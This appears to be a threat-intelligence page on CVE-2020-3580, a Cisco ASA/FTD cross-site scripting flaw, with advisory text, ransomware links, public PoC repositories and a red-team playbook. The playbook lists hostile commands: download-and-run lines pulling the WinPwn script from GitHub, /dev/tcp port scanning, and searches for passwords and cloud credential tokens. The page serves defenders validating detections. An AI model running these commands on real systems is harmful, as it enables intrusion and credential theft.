CVE-2020-3580
Overview
This vulnerability is a cross-site scripting (XSS) flaw arising from insufficient validation of user-supplied input in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. Specifically, the affected component improperly sanitizes input parameters in the web interface, allowing injection of malicious script code. The vulnerability is localized to specific AnyConnect and WebVPN configurations within the web services interface.
Vulnerability Description
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
Impact
An unauthenticated attacker can exploit this vulnerability by convincing a user of the web services interface to click a specially crafted link, resulting in execution of arbitrary script code within the user's browser context. This can lead to theft of sensitive browser-based information, session hijacking, or interface defacement. The attack requires user interaction but no authentication, potentially compromising confidentiality and integrity of user sessions and data accessed through the affected web interface.
Solution
Cisco has released security updates addressing this vulnerability in specific versions of Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-asaftd-xss-multiple-FCB3vPZe available at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe. No alternative workarounds are documented; timely application of vendor-supplied patches is recommended to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software arises from inadequate validation of user-supplied input. This weakness permits an unauthenticated, remote attacker to execute cross-site scripting (XSS) attacks against users interacting with the affected devices. By exploiting this flaw, an attacker can craft malicious links that, when clicked by a user, execute arbitrary script code within the context of the web services interface. This exploitation can lead to unauthorized access to sensitive information stored in the user's browser, such as cookies, session tokens, or other personal data.
Attack vectors for this vulnerability primarily involve social engineering tactics. An attacker may send a user a deceptive link that appears legitimate, prompting them to access the web services interface of the affected device. Once the user clicks the link, the malicious script executes, potentially redirecting the user to a phishing site or enabling the attacker to manipulate the user’s session. Furthermore, if the user has administrative access to the device, the consequences can be significantly more severe, allowing the attacker to gain control over the device and compromise the entire network infrastructure.
The real-world impact of this vulnerability can be substantial, particularly for organizations relying on Cisco's security products to protect their networks. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even a full compromise of the network. The business risks associated with such incidents include financial loss, reputational damage, regulatory penalties, and the potential for further attacks stemming from the initial breach. Organizations may also face increased scrutiny from stakeholders and customers, leading to a loss of trust and confidence in their security measures.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected Cisco products is crucial to close the security gaps. Additionally, employing web application firewalls (WAFs) can help filter out malicious traffic and prevent XSS attacks. User training and awareness programs are also essential, as they can equip employees with the knowledge to recognize phishing attempts and avoid clicking on suspicious links. Monitoring logs for unusual access patterns or behaviors can further aid in identifying potential exploitation attempts.
In conclusion, the vulnerabilities present in the web services interface of Cisco ASA and FTD Software pose significant threats to organizations that utilize these products. The potential for cross-site scripting attacks highlights the importance of robust input validation and user awareness. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against the risks associated with these vulnerabilities, ensuring the integrity and security of their network environments.
CSURFACE threat intelligence has detected a modest but consistent uptick in activity related to CVE-2020-3580, reflected in a slight increase in telemetry signals and a marginal rise in the EPSS score. This trend indicates that adversaries continue to probe and potentially exploit the cross-site scripting vulnerabilities in Cisco ASA and FTD web interfaces. The persistence of publicly available proof-of-concept exploits further lowers the barrier for exploitation attempts. Notably, ransomware groups such as Akira remain linked to campaigns leveraging this vulnerability, underscoring its relevance in extortion-driven threat scenarios. While the overall risk level remains medium, the observed increase in exploitation attempts and sustained interest from ransomware actors suggest defenders should maintain heightened vigilance. This evolving landscape reinforces the importance of continuous monitoring to detect early signs of compromise and to understand attacker behaviors targeting these specific Cisco products.
Update 2 — July 03, 2026
CSURFACE threat intelligence has identified a notable uptick in exploitation attempts targeting CVE-2020-3580, reflected by a marked escalation in telemetry signals from our sensors. This increase, while moderate, signals sustained adversary interest, particularly from ransomware groups such as Akira and Sinobi, which continue to leverage this vulnerability in extortion campaigns. Concurrently, new proof-of-concept exploits have surfaced on public repositories, broadening the toolkit available to attackers and potentially lowering the technical barrier for exploitation. Although the EPSS score remains stable and high, indicating consistent exploitability, the combination of increased detection activity and expanded exploit resources elevates the operational risk. For defenders, this evolving threat landscape underscores the necessity of maintaining vigilant monitoring and rapid incident response capabilities. While the overall severity rating remains medium, the heightened exploitation activity and ransomware associations justify an increased emphasis on detection and threat hunting efforts related to Cisco ASA and FTD web services interfaces.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Firepower Threat Defense | All |
cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
|
|
|
Cisco | Firepower Threat Defense | All |
cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
|
|
|
Cisco | Firepower Threat Defense | All |
cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
adarshvs/CVE-2020-3580
Automated bulk IP or domain scanner for CVE 2020 3580. Cisco ASA and FTD XSS hunter.
|
adarshvs | 19 | 4 | 2021-06-28 | View |
|
Hudi233/CVE-2020-3580
|
Hudi233 | 9 | 4 | 2021-06-25 | View |
|
catatonicprime/CVE-2020-3580
Additional exploits for XSS in Cisco ASA devices discovered by PTSwarm
|
catatonicprime | 2 | 1 | 2022-07-15 | View |
|
cruxN3T/CVE-2020-3580
Cisco ASA XSS CVE-2020-3580
|
cruxN3T | 0 | 0 | 2022-06-24 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-3580 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3580 |